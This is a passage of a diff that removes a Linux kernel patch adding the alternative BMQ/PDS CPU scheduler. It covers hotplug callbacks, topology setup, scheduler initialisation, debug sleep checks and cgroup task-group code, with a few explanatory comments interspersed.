-+		partition_sched_domains(1, NULL, NULL);
-+		if (--num_cpus_frozen)
-+			return;
-+		/*
-+		 * This is the last CPU online operation. So fall through and
-+		 * restore the original sched domains by considering the
-+		 * cpuset configurations.
-+		 */
-+		cpuset_force_rebuild();
-+	}
-+
-+	cpuset_update_active_cpus();
-+}
-+
-+static int cpuset_cpu_inactive(unsigned int cpu)
-+{
-+	if (!cpuhp_tasks_frozen) {
-+		cpuset_update_active_cpus();
-+	} else {
-+		num_cpus_frozen++;
-+		partition_sched_domains(1, NULL, NULL);
-+	}
-+	return 0;
-+}
-+
-+int sched_cpu_activate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/*
-+	 * Clear the balance_push callback and prepare to schedule
-+	 * regular tasks.
-+	 */
-+	balance_push_set(cpu, false);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going up, increment the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
-+		static_branch_inc_cpuslocked(&sched_smt_present);
-+#endif
-+	set_cpu_active(cpu, true);
-+
-+	if (sched_smp_initialized)
-+		cpuset_cpu_active();
-+
-+	/*
-+	 * Put the rq online, if not already. This happens:
-+	 *
-+	 * 1) In the early boot process, because we build the real domains
-+	 *    after all cpus have been brought up.
-+	 *
-+	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
-+	 *    domains.
-+	 */
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	set_rq_online(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	return 0;
-+}
-+
-+int sched_cpu_deactivate(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+	int ret;
-+
-+	set_cpu_active(cpu, false);
-+
-+	/*
-+	 * From this point forward, this CPU will refuse to run any task that
-+	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
-+	 * push those tasks away until this gets cleared, see
-+	 * sched_cpu_dying().
-+	 */
-+	balance_push_set(cpu, true);
-+
-+	/*
-+	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
-+	 * users of this state to go away such that all new such users will
-+	 * observe it.
-+	 *
-+	 * Specifically, we rely on ttwu to no longer target this CPU, see
-+	 * ttwu_queue_cond() and is_cpu_allowed().
-+	 *
-+	 * Do the synchronization before parking the smpboot threads to take
-+	 * care of the RCU boost case.
-+	 */
-+	synchronize_rcu();
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	update_rq_clock(rq);
-+	set_rq_offline(rq);
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+#ifdef CONFIG_SCHED_SMT
-+	/*
-+	 * When going down, decrement the number of cores with SMT present.
-+	 */
-+	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
-+		static_branch_dec_cpuslocked(&sched_smt_present);
-+		if (!static_branch_likely(&sched_smt_present))
-+			cpumask_clear(&sched_sg_idle_mask);
-+	}
-+#endif
-+
-+	if (!sched_smp_initialized)
-+		return 0;
-+
-+	ret = cpuset_cpu_inactive(cpu);
-+	if (ret) {
-+		balance_push_set(cpu, false);
-+		set_cpu_active(cpu, true);
-+		return ret;
-+	}
-+
-+	return 0;
-+}
-+
-+static void sched_rq_cpu_starting(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	rq->calc_load_update = calc_load_update;
-+}
-+
-+int sched_cpu_starting(unsigned int cpu)
-+{
-+	sched_rq_cpu_starting(cpu);
-+	sched_tick_start(cpu);
-+	return 0;
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+
-+/*
-+ * Invoked immediately before the stopper thread is invoked to bring the
-+ * CPU down completely. At this point all per CPU kthreads except the
-+ * hotplug thread (current) and the stopper thread (inactive) have been
-+ * either parked or have been unbound from the outgoing CPU. Ensure that
-+ * any of those which might be on the way out are gone.
-+ *
-+ * If after this point a bound task is being woken on this CPU then the
-+ * responsible hotplug callback has failed to do its job.
-+ * sched_cpu_dying() will catch it with the appropriate fireworks.
-+ */
-+int sched_cpu_wait_empty(unsigned int cpu)
-+{
-+	balance_hotplug_wait();
-+	return 0;
-+}
-+
-+/*
-+ * Since this CPU is going 'away' for a while, fold any nr_active delta we
-+ * might have. Called from the CPU stopper task after ensuring that the
-+ * stopper is the last running task on the CPU, so nr_active count is
-+ * stable. We need to take the teardown thread which is calling this into
-+ * account, so we hand in adjust = 1 to the load calculation.
-+ *
-+ * Also see the comment "Global load-average calculations".
-+ */
-+static void calc_load_migrate(struct rq *rq)
-+{
-+	long delta = calc_load_fold_active(rq, 1);
-+
-+	if (delta)
-+		atomic_long_add(delta, &calc_load_tasks);
-+}
-+
-+static void dump_rq_tasks(struct rq *rq, const char *loglvl)
-+{
-+	struct task_struct *g, *p;
-+	int cpu = cpu_of(rq);
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
-+	for_each_process_thread(g, p) {
-+		if (task_cpu(p) != cpu)
-+			continue;
-+
-+		if (!task_on_rq_queued(p))
-+			continue;
-+
-+		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
-+	}
-+}
-+
-+int sched_cpu_dying(unsigned int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	/* Handle pending wakeups and then migrate everything off */
-+	sched_tick_stop(cpu);
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
-+		WARN(true, "Dying CPU not properly vacated!");
-+		dump_rq_tasks(rq, KERN_WARNING);
-+	}
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	calc_load_migrate(rq);
-+	hrtick_clear(rq);
-+	return 0;
-+}
-+#endif
-+
-+#ifdef CONFIG_SMP
-+static void sched_init_topology_cpumask_early(void)
-+{
-+	int cpu;
-+	cpumask_t *tmp;
-+
-+	for_each_possible_cpu(cpu) {
-+		/* init topo masks */
-+		tmp = per_cpu(sched_cpu_topo_masks, cpu);
-+
-+		cpumask_copy(tmp, cpumask_of(cpu));
-+		tmp++;
-+		cpumask_copy(tmp, cpu_possible_mask);
-+		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
-+		/*per_cpu(sd_llc_id, cpu) = cpu;*/
-+	}
-+}
-+
-+#define TOPOLOGY_CPUMASK(name, mask, last)\
-+	if (cpumask_and(topo, topo, mask)) {					\
-+		cpumask_copy(topo, mask);					\
-+		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
-+		       cpu, (topo++)->bits[0]);					\
-+	}									\
-+	if (!last)								\
-+		cpumask_complement(topo, mask)
-+
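-+/*
-+ * Illustrative note (not part of this patch): the macro above records one
-+ * topology level per slot.  A level's mask is stored (and the cursor
-+ * advanced) only if it still intersects the not-yet-covered CPUs held in
-+ * the current slot; the complement written afterwards makes the next,
-+ * wider level match only the CPUs it newly adds.
-+ */
-+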
-+static void sched_init_topology_cpumask(void)
-+{
-+	int cpu;
-+	cpumask_t *topo;
-+
-+	for_each_online_cpu(cpu) {
-+		/* take chance to reset time slice for idle tasks */
-+		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
-+
-+		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+
-+		cpumask_complement(topo, cpumask_of(cpu));
-+#ifdef CONFIG_SCHED_SMT
-+		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
-+#endif
-+		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
-+		per_cpu(sched_cpu_llc_mask, cpu) = topo;
-+		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
-+
-+		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
-+
-+		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
-+		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
-+		       cpu, per_cpu(sd_llc_id, cpu),
-+		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
-+			      per_cpu(sched_cpu_topo_masks, cpu)));
-+	}
-+}
-+#endif
-+
-+void __init sched_init_smp(void)
-+{
-+	/* Move init over to a non-isolated CPU */
-+	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
-+		BUG();
-+	current->flags &= ~PF_NO_SETAFFINITY;
-+
-+	sched_init_topology_cpumask();
-+
-+	sched_smp_initialized = true;
-+}
-+
-+static int __init migration_init(void)
-+{
-+	sched_cpu_starting(smp_processor_id());
-+	return 0;
-+}
-+early_initcall(migration_init);
-+
-+#else
-+void __init sched_init_smp(void)
-+{
-+	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
-+}
-+#endif /* CONFIG_SMP */
-+
-+int in_sched_functions(unsigned long addr)
-+{
-+	return in_lock_functions(addr) ||
-+		(addr >= (unsigned long)__sched_text_start
-+		&& addr < (unsigned long)__sched_text_end);
-+}
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+/* task group related information */
-+struct task_group {
-+	struct cgroup_subsys_state css;
-+
-+	struct rcu_head rcu;
-+	struct list_head list;
-+
-+	struct task_group *parent;
-+	struct list_head siblings;
-+	struct list_head children;
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	unsigned long		shares;
-+#endif
-+};
-+
-+/*
-+ * Default task group.
-+ * Every task in the system belongs to this group at bootup.
-+ */
-+struct task_group root_task_group;
-+LIST_HEAD(task_groups);
-+
-+/* Cacheline aligned slab cache for task_group */
-+static struct kmem_cache *task_group_cache __read_mostly;
-+#endif /* CONFIG_CGROUP_SCHED */
-+
-+void __init sched_init(void)
-+{
-+	int i;
-+	struct rq *rq;
-+
-+	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
-+
-+	wait_bit_init();
-+
-+#ifdef CONFIG_SMP
-+	for (i = 0; i < SCHED_QUEUE_BITS; i++)
-+		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+	task_group_cache = KMEM_CACHE(task_group, 0);
-+
-+	list_add(&root_task_group.list, &task_groups);
-+	INIT_LIST_HEAD(&root_task_group.children);
-+	INIT_LIST_HEAD(&root_task_group.siblings);
-+#endif /* CONFIG_CGROUP_SCHED */
-+	for_each_possible_cpu(i) {
-+		rq = cpu_rq(i);
-+
-+		sched_queue_init(&rq->queue);
-+		rq->prio = IDLE_TASK_SCHED_PRIO;
-+		rq->skip = NULL;
-+
-+		raw_spin_lock_init(&rq->lock);
-+		rq->nr_running = rq->nr_uninterruptible = 0;
-+		rq->calc_load_active = 0;
-+		rq->calc_load_update = jiffies + LOAD_FREQ;
-+#ifdef CONFIG_SMP
-+		rq->online = false;
-+		rq->cpu = i;
-+
-+#ifdef CONFIG_SCHED_SMT
-+		rq->active_balance = 0;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
-+#endif
-+		rq->balance_callback = &balance_push_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+		rcuwait_init(&rq->hotplug_wait);
-+#endif
-+#endif /* CONFIG_SMP */
-+		rq->nr_switches = 0;
-+
-+		hrtick_rq_init(rq);
-+		atomic_set(&rq->nr_iowait, 0);
-+	}
-+#ifdef CONFIG_SMP
-+	/* Set rq->online for cpu 0 */
-+	cpu_rq(0)->online = true;
-+#endif
-+	/*
-+	 * The boot idle thread does lazy MMU switching as well:
-+	 */
-+	mmgrab(&init_mm);
-+	enter_lazy_tlb(&init_mm, current);
-+
-+	/*
-+	 * The idle task doesn't need the kthread struct to function, but it
-+	 * is dressed up as a per-CPU kthread and thus needs to play the part
-+	 * if we want to avoid special-casing it in code that deals with per-CPU
-+	 * kthreads.
-+	 */
-+	WARN_ON(!set_kthread_struct(current));
-+
-+	/*
-+	 * Make us the idle thread. Technically, schedule() should not be
-+	 * called from this thread, however somewhere below it might be,
-+	 * but because we are the idle thread, we just pick up running again
-+	 * when this runqueue becomes "idle".
-+	 */
-+	init_idle(current, smp_processor_id());
-+
-+	calc_load_update = jiffies + LOAD_FREQ;
-+
-+#ifdef CONFIG_SMP
-+	idle_thread_set_boot_cpu();
-+	balance_push_set(smp_processor_id(), false);
-+
-+	sched_init_topology_cpumask_early();
-+#endif /* SMP */
-+
-+	psi_init();
-+
-+	preempt_dynamic_init();
-+}
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+
-+void __might_sleep(const char *file, int line)
-+{
-+	unsigned int state = get_current_state();
-+	/*
-+	 * Blocking primitives will set (and therefore destroy) current->state,
-+	 * since we will exit with TASK_RUNNING make sure we enter with it,
-+	 * otherwise we will destroy state.
-+	 */
-+	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
-+			"do not call blocking ops when !TASK_RUNNING; "
-+			"state=%x set at [<%p>] %pS\n", state,
-+			(void *)current->task_state_change,
-+			(void *)current->task_state_change);
-+
-+	__might_resched(file, line, 0);
-+}
-+EXPORT_SYMBOL(__might_sleep);
-+
-+static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
-+{
-+	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
-+		return;
-+
-+	if (preempt_count() == preempt_offset)
-+		return;
-+
-+	pr_err("Preemption disabled at:");
-+	print_ip_sym(KERN_ERR, ip);
-+}
-+
-+static inline bool resched_offsets_ok(unsigned int offsets)
-+{
-+	unsigned int nested = preempt_count();
-+
-+	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
-+
-+	return nested == offsets;
-+}
-+
-+void __might_resched(const char *file, int line, unsigned int offsets)
-+{
-+	/* Ratelimiting timestamp: */
-+	static unsigned long prev_jiffy;
-+
-+	unsigned long preempt_disable_ip;
-+
-+	/* WARN_ON_ONCE() by default, no rate limit required: */
-+	rcu_sleep_check();
-+
-+	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
-+	     !is_idle_task(current) && !current->non_block_count) ||
-+	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
-+	    oops_in_progress)
-+		return;
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	/* Save this before calling printk(), since that will clobber it: */
-+	preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
-+	       file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), current->non_block_count,
-+	       current->pid, current->comm);
-+	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
-+	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
-+
-+	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
-+		pr_err("RCU nest depth: %d, expected: %u\n",
-+		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
-+	}
-+
-+	if (task_stack_end_corrupted(current))
-+		pr_emerg("Thread overran stack, or stack corrupted\n");
-+
-+	debug_show_held_locks(current);
-+	if (irqs_disabled())
-+		print_irqtrace_events(current);
-+
-+	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
-+				 preempt_disable_ip);
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL(__might_resched);
-+
-+void __cant_sleep(const char *file, int line, int preempt_offset)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > preempt_offset)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
-+	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
-+			in_atomic(), irqs_disabled(),
-+			current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_sleep);
-+
-+#ifdef CONFIG_SMP
-+void __cant_migrate(const char *file, int line)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (is_migration_disabled(current))
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > 0)
-+		return;
-+
-+	if (current->migration_flags & MDF_FORCE_ENABLED)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
-+	       current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_migrate);
-+#endif
-+#endif
-+
-+#ifdef CONFIG_MAGIC_SYSRQ
-+void normalize_rt_tasks(void)
-+{
-+	struct task_struct *g, *p;
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+	};
-+
-+	read_lock(&tasklist_lock);
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * Only normalize user tasks:
-+		 */
-+		if (p->flags & PF_KTHREAD)
-+			continue;
-+
-+		schedstat_set(p->stats.wait_start,  0);
-+		schedstat_set(p->stats.sleep_start, 0);
-+		schedstat_set(p->stats.block_start, 0);
-+
-+		if (!rt_task(p)) {
-+			/*
-+			 * Renice negative nice level userspace
-+			 * tasks back to 0:
-+			 */
-+			if (task_nice(p) < 0)
-+				set_user_nice(p, 0);
-+			continue;
-+		}
-+
-+		__sched_setscheduler(p, &attr, false, false);
-+	}
-+	read_unlock(&tasklist_lock);
-+}
-+#endif /* CONFIG_MAGIC_SYSRQ */
-+
-+#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
-+/*
-+ * These functions are only useful for the IA64 MCA handling, or kdb.
-+ *
-+ * They can only be called when the whole system has been
-+ * stopped - every CPU needs to be quiescent, and no scheduling
-+ * activity can take place. Using them for anything else would
-+ * be a serious bug, and as a result, they aren't even visible
-+ * under any other configuration.
-+ */
-+
-+/**
-+ * curr_task - return the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ *
-+ * Return: The current task for @cpu.
-+ */
-+struct task_struct *curr_task(int cpu)
-+{
-+	return cpu_curr(cpu);
-+}
-+
-+#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
-+
-+#ifdef CONFIG_IA64
-+/**
-+ * ia64_set_curr_task - set the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ * @p: the task pointer to set.
-+ *
-+ * Description: This function must only be used when non-maskable interrupts
-+ * are serviced on a separate stack.  It allows the architecture to switch the
-+ * notion of the current task on a CPU in a non-blocking manner.  This function
-+ * must be called with all CPUs synchronised and interrupts disabled; the
-+ * caller must save the original value of the current task (see
-+ * curr_task() above) and restore that value before reenabling interrupts and
-+ * re-starting the system.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ */
-+void ia64_set_curr_task(int cpu, struct task_struct *p)
-+{
-+	cpu_curr(cpu) = p;
-+}
-+
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+static void sched_free_group(struct task_group *tg)
-+{
-+	kmem_cache_free(task_group_cache, tg);
-+}
-+
-+static void sched_free_group_rcu(struct rcu_head *rhp)
-+{
-+	sched_free_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+static void sched_unregister_group(struct task_group *tg)
-+{
-+	/*
-+	 * We have to wait for yet another RCU grace period to expire, as
-+	 * print_cfs_stats() might run concurrently.
-+	 */
-+	call_rcu(&tg->rcu, sched_free_group_rcu);
-+}
-+
-+/* allocate runqueue etc for a new task group */
-+struct task_group *sched_create_group(struct task_group *parent)
-+{
-+	struct task_group *tg;
-+
-+	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
-+	if (!tg)
-+		return ERR_PTR(-ENOMEM);
-+
-+	return tg;
-+}
-+
-+void sched_online_group(struct task_group *tg, struct task_group *parent)
-+{
-+}
-+
-+/* rcu callback to free various structures associated with a task group */
-+static void sched_unregister_group_rcu(struct rcu_head *rhp)
-+{
-+	/* Now it should be safe to free those cfs_rqs: */
-+	sched_unregister_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+void sched_destroy_group(struct task_group *tg)
-+{
-+	/* Wait for possible concurrent references to cfs_rqs to complete: */
-+	call_rcu(&tg->rcu, sched_unregister_group_rcu);
-+}
-+
-+void sched_release_group(struct task_group *tg)
-+{
-+}
-+
-+static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
-+{
-+	return css ? container_of(css, struct task_group, css) : NULL;
-+}
-+
-+static struct cgroup_subsys_state *
-+cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
-+{
-+	struct task_group *parent = css_tg(parent_css);
-+	struct task_group *tg;
-+
-+	if (!parent) {
-+		/* This is early initialization for the top cgroup */
-+		return &root_task_group.css;
-+	}
-+
-+	tg = sched_create_group(parent);
-+	if (IS_ERR(tg))
-+		return ERR_PTR(-ENOMEM);
-+	return &tg->css;
-+}
-+
-+/* Expose task group only after completing cgroup initialization */
-+static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+	struct task_group *parent = css_tg(css->parent);
-+
-+	if (parent)
-+		sched_online_group(tg, parent);
-+	return 0;
-+}
-+
-+static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	sched_release_group(tg);
-+}
-+
-+static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	/*
-+	 * Relies on the RCU grace period between css_released() and this.
-+	 */
-+	sched_unregister_group(tg);
-+}
-+
-+#ifdef CONFIG_RT_GROUP_SCHED
-+static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
-+{
-+	return 0;
-+}
-+#endif
-+
-+static void cpu_cgroup_attach(struct cgroup_taskset *tset)
-+{
-+}
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+static DEFINE_MUTEX(shares_mutex);
-+
-+int sched_group_set_shares(struct task_group *tg, unsigned long shares)
-+{
-+	/*
-+	 * We can't change the weight of the root cgroup.
-+	 */
-+	if (&root_task_group == tg)
-+		return -EINVAL;
-+
-+	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
-+
-+	mutex_lock(&shares_mutex);
-+	if (tg->shares == shares)
-+		goto done;
-+
-+	tg->shares = shares;
-+done:
-+	mutex_unlock(&shares_mutex);
-+	return 0;
-+}
-+
-+static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
-+				struct cftype *cftype, u64 shareval)
-+{
-+	if (shareval > scale_load_down(ULONG_MAX))
-+		shareval = MAX_SHARES;
-+	return sched_group_set_shares(css_tg(css), scale_load(shareval));
-+}
-+
-+static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
-+			       struct cftype *cft)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	return (u64) scale_load_down(tg->shares);
-+}
-+#endif
-+
-+static struct cftype cpu_legacy_files[] = {
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	{
-+		.name = "shares",
-+		.read_u64 = cpu_shares_read_u64,
-+		.write_u64 = cpu_shares_write_u64,
-+	},
-+#endif
-+	{ }	/* Terminate */
-+};
-+
-+
-+static struct cftype cpu_files[] = {
-+	{ }	/* terminate */
-+};
-+
-+static int cpu_extra_stat_show(struct seq_file *sf,
-+			       struct cgroup_subsys_state *css)
-+{
-+	return 0;
-+}
-+
-+struct cgroup_subsys cpu_cgrp_subsys = {
-+	.css_alloc	= cpu_cgroup_css_alloc,
-+	.css_online	= cpu_cgroup_css_online,
-+	.css_released	= cpu_cgroup_css_released,
-+	.css_free	= cpu_cgroup_css_free,
-+	.css_extra_stat_show = cpu_extra_stat_show,
-+#ifdef CONFIG_RT_GROUP_SCHED
-+	.can_attach	= cpu_cgroup_can_attach,
-+#endif
-+	.attach		= cpu_cgroup_attach,
-+	.legacy_cftypes	= cpu_legacy_files,
-+	.dfl_cftypes	= cpu_files,
-+	.early_init	= true,
-+	.threaded	= true,
-+};
-+#endif	/* CONFIG_CGROUP_SCHED */
-+
-+#undef CREATE_TRACE_POINTS
-diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
-new file mode 100644
-index 000000000000..1212a031700e
---- /dev/null
-+++ b/kernel/sched/alt_debug.c
-@@ -0,0 +1,31 @@
-+/*
-+ * kernel/sched/alt_debug.c
-+ *
-+ * Print the alt scheduler debugging details
-+ *
-+ * Author: Alfred Chen
-+ * Date  : 2020
-+ */
-+#include "sched.h"
-+
-+/*
-+ * This allows printing both to /proc/sched_debug and
-+ * to the console
-+ */
-+#define SEQ_printf(m, x...)			\
-+ do {						\
-+	if (m)					\
-+		seq_printf(m, x);		\
-+	else					\
-+		pr_cont(x);			\
-+ } while (0)
-+
-+void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
-+			  struct seq_file *m)
-+{
-+	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
-+						get_nr_threads(p));
-+}
-+
-+void proc_sched_set_task(struct task_struct *p)
-+{}
-diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
-new file mode 100644
-index 000000000000..c32403ed82b6
---- /dev/null
-+++ b/kernel/sched/alt_sched.h
-@@ -0,0 +1,668 @@
-+#ifndef ALT_SCHED_H
-+#define ALT_SCHED_H
-+
-+#include <linux/context_tracking.h>
-+#include <linux/profile.h>
-+#include <linux/psi.h>
-+#include <linux/stop_machine.h>
-+#include <linux/syscalls.h>
-+#include <linux/tick.h>
-+
-+#include <trace/events/power.h>
-+#include <trace/events/sched.h>
-+
-+#include "../workqueue_internal.h"
-+
-+#include "cpupri.h"
-+
-+#ifdef CONFIG_SCHED_BMQ
-+/* bits:
-+ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
-+#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
-+#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
-+#endif /* CONFIG_SCHED_PDS */
-+
-+#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
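/*
 * Worked numbers, illustrative only: assuming MIN_NORMAL_PRIO == 128
 * (RT 0-99 plus the reserved 100-127 range noted above) and
 * NORMAL_PRIO_NUM == 64 as defined elsewhere in this patch, PDS gets:
 *
 *   SCHED_BITS           = 128 + 64 + 1 = 193
 *   IDLE_TASK_SCHED_PRIO = 193 - 1     = 192
 *
 * so the idle task always occupies the last queue slot and a
 * find_first_bit() over the queue bitmap returns it only when nothing
 * else is runnable.
 */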
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
-+extern void resched_latency_warn(int cpu, u64 latency);
-+#else
-+# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
-+static inline void resched_latency_warn(int cpu, u64 latency) {}
-+#endif
-+
-+/*
-+ * Increase resolution of nice-level calculations for 64-bit architectures.
-+ * The extra resolution improves shares distribution and load balancing of
-+ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
-+ * hierarchies, especially on larger systems. This is not a user-visible change
-+ * and does not change the user-interface for setting shares/weights.
-+ *
-+ * We increase resolution only if we have enough bits to allow this increased
-+ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
-+ * are pretty high and the returns do not justify the increased costs.
-+ *
-+ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
-+ * increase coverage and consistency always enable it on 64-bit platforms.
-+ */
-+#ifdef CONFIG_64BIT
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load_down(w) \
-+({ \
-+	unsigned long __w = (w); \
-+	if (__w) \
-+		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
-+	__w; \
-+})
-+#else
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		(w)
-+# define scale_load_down(w)	(w)
-+#endif
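/*
 * Illustrative sketch, not part of the patch: with
 * SCHED_FIXEDPOINT_SHIFT == 10 on 64-bit, shares travel through the
 * scheduler with ten extra bits of fixed-point resolution.
 */
static inline unsigned long example_shares_roundtrip(void)
{
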